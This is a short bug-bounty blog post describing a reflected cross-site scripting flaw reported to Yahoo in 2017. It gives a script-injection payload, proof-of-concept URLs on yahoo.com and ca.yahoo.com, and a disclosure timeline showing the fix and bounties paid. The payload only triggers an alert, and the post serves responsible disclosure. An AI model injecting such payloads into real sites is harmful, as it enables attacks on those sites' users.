Reflected XSS in Yahoo!

Shahzada Al Shahriar Khan Thursday, August 31, 2017 Bug Bounty Cross-Site Scripting Ethical Hacking Hackerone Reflected XSS in Yahoo XSS In Yahoo

Hello Guys, This is Shahzada Al Shahriar Khan. Known as TheShahzada.

I am from Bangladesh. And I am Newbie in Bug Bounty. :P

Well, Now I will share how I found Reflected Cross-Site Scripting (XSS) in main & sub domain of Yahoo.

Vulnerable URL:
1. https://www.yahoo.com/movies/film/[*]
2. https://ca.yahoo.com/movies/film/[*]

Payload I Use:
“><%2fscript><script>alert(document.domain)<%2fscript>

PoC URL:
1. https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
2. https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>

PoC:

Yahoo Canada Subdomain

Video PoC:

https://youtu.be/QHRbzyIlpkc

Timeline: Aug 12th — I Submitted The Report. Aug 15th — Triaged The Report & Rewarded Me $300 Initial Bounty. Aug 16th — Resolved Aug 24th — $400 Bounty Rewarded.

./The_S


Originally published at blog.theshahzada.com on August 31, 2017.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store